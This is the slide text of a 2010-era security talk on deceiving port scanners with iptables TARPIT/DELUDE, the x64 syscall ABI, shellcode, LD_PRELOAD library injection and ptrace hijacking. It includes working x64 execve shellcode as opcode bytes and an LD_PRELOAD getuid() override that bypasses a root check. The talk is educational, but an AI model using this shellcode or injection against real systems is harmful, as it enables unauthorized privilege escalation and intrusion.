  • 1. Code Red Security - The Art of Deception - x64 shell codes and kernel ABI - DL-Injection - Hijacking processes with ptrace() - DL-Injection attack vector (Don't try it at home) Session by Amr Ali http://amr-ali.co.cc/ [email_address]
  • 2. The Art of Deception Kevin Mitnick
  • 3. The Art of Deception - We are talking today about deceiving port scanners and other reconnaissance tools and/or techniques. Iptables is the main firewall used by Linux users around the world, so we are going to make great use of it with a little but very effective add-on called xtables . - TARPIT and DELUDE are the main targets xtables provides for our purposes. TARPIT captures and holds incoming TCP connections using no local per connection resources. Connections are accepted, but immediately switched to the persist state (0 byte window), in which the remote side stops sending data and asks to continue every 60-240 seconds. Attempts to close the connection are ignored, forcing the remote side to time out the connection in 12-24 minutes. SYN ---------------> Server SYN/ACK <-------------------- Server ACK ----------------------> Server WIN[0] <--------------------- Server
  • 4. The Art of Deception - The DELUDE target will reply to a SYN packet with SYN/ACK, and to all other packets with a RST. This will terminate the connection much like REJECT, but network scanners doing TCP half open discovery can be spoofed to make them believe the port is open rather than closed/filtered. - In lesser words, if someone is doing a SYN scan the response to his packets by a SYN/ACK packet, but will receive a RST if she sent an ACK, so the connection will be terminated much like the REJECT target. Same applies for ACK scan(s). Of course you will have to make sure first that a scan in place, otherwise you will kill legitimate connections. SYN --------------------> Server SYN/ACK <------------------- Server ACK -----------------------> Server RST <------------------------ Server
  • 5. The Art of Deception # nmap -v -A --reason --version-all --script all -T4 -n 192.168.1.100 Starting Nmap 5.00 ( http://nmap.org ) at 2010-04-03 02:56 EET NSE: Loaded 59 scripts for scanning. Initiating SYN Stealth Scan at 02:59 Scanning 192.168.1.100 [1000 ports] Discovered open port 4422/tcp on 192.168.1.100 Discovered open port 6/tcp on 192.168.1.100 Discovered open port 78/tcp on 192.168.1.100 Discovered open port 1337/tcp on 192.168.1.100 Discovered open port 31337/tcp on 192.168.1.100 Discovered open port 88/tcp on 192.168.1.100 Discovered open port 123/tcp on 192.168.1.100 Discovered open port 8879/tcp on 192.168.1.100 Discovered open port 550/tcp on 192.168.1.100 Discovered open port 9200/tcp on 192.168.1.100 Discovered open port 5/tcp on 192.168.1.100 Discovered open port 404/tcp on 192.168.1.100 ........
  • 6. x64 shell codes and kernel ABI - x86 shell coders are very used and familiar with x86 CPU registers, and its plain kernel ABI, which are ..... EAX : Holds the system call number. EBX : Contains the value or address of the 1 st argument to the system call. ECX : Contains the value or address of the 2 nd argument to the system call. EDX : Contains the value or address of the 3 rd argument to the system call. EDI : General purpose register. ESI : General purpose register. EBP : Base Pointer register. ESP : Stack Pointer register. EIP : Instruction Pointer register. These registers are plain and simple, however when it comes to x64 platforms the kernel ABI changes a bit differently in which that extra general purpose registers are added, and system call arguments registers are different.
  • 7. x64 shell codes and kernel ABI - x64 registers and kernel ABI are as fellows … RAX : Contains the system call number. RBX : General purpose register. RCX : General purpose register. RDX : The 3 rd argument for the system call. RDI : The 1 st argument for the system call. RSI : The 2 nd argument for the system call. RBP : Base Pointer register. RSP : Stack Pointer register. RIP : Instruction Pointer register. R8 : The 4 th argument for the system call. R9 : The 5 th argument for the system call. R10 : The 6 th argument for the system call. R11 – R15 : General purpose registers. - Of course these are 64bit register instead of their counter part 32bit registers.
  • 8. x64 shell codes and kernel ABI - Lets write a little x64 shell code, shall we? [CODE] .global _start _start: xorq %rdx, %rdx push %rdx movq $0x68732f6e69622f2f, %rbx # //bin/bash push %rbx push %rsp pop %rdi push %rdx push %rdi push %rsp pop %rsi push $0x3b pop %rax syscall arg1: .string “//bin/sh” [/CODE]
  • 9. x64 shell codes and kernel ABI - So after getting the opcodes for the shell code we've written we now can put it in a string as in the form of … \x48\x31\xd2\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x6a\x3b\x58\x0f\x05 - Now we should compile and run our assembly code to make sure its running... [email_address] (/tmp):$ as test.s -o test.o [email_address] (/tmp):$ ld -s test.o -o test [email_address] (/tmp):$ ./test # Now we have confirmed it is running, its only a matter of writing an exploit and the above shell code in a string to exploit whatever vulnerable piece of code you are targeting.
  • 10. DL-Injection - DL-Injection is done by injecting a dynamic library in a compiled application to override certain functionalities called from other shared libraries. The technique used can be as simple as setting an environment v a riable ( LD_PRELOAD ) and as complex as overwriting certain application PLT ( Procedure Linkage Table ) entries. - This kind of attack can be very useful in applications that does internal authentication and does not ensure the integrity of the information the system provides. For example … [CODE] .... If (getuid() == 0) { // do stuff authenticated stuff here. } ....
  • 11. DL-Injection - The previous code gets the UID of the user and executes certain codes based on that. However it does not make sure that this information is true in the sense that it is not spoofed. - Now we can easily bypass this security check by simply injecting a library into this application space with a function that overrides getuid() that always returns zero. [CODE] Int getuid() { return 0; } [/CODE] [email_address] (/tmp):$ gcc -shared -fPIC inj.c -o inj.so [email_address] (/tmp):$ LD_PRELOAD=/tmp/inj.so ./vuln_app - Now we successfully bypassed that application security, by spoofing getuid() to always return zero.
  • 12. Hijacking Processes – ptrace() - ptrace() is a function used to debug applications by setting breakpoints or monitor the process' registers and memory with the right permissions. We'll see in a few lines a demonstration on how to hijack a process and inject a shell code into its execution flow through overwriting its IP ( Instruction Pointer ). - We'll demonstrate this on a 32bit platform and a 64bit platform to understand further the difference between each platform assembly and kernel ABI. LIVE DEMONSTRATION
  • 13. DL-Injection Attack Vector - We'll now try to mount a local privilege escalation attack on a system, assuming that we already got normal user access.
  • 14. Thanks Thanks All my presentation(s) files will be on my website. If you have any questions or comments please do not hesitate to visit my website or contact me via email http://amr-ali.co.cc [email_address] For job offers, please visit … http://amr-ali.co.cc/resume

Download presentation

Your download has started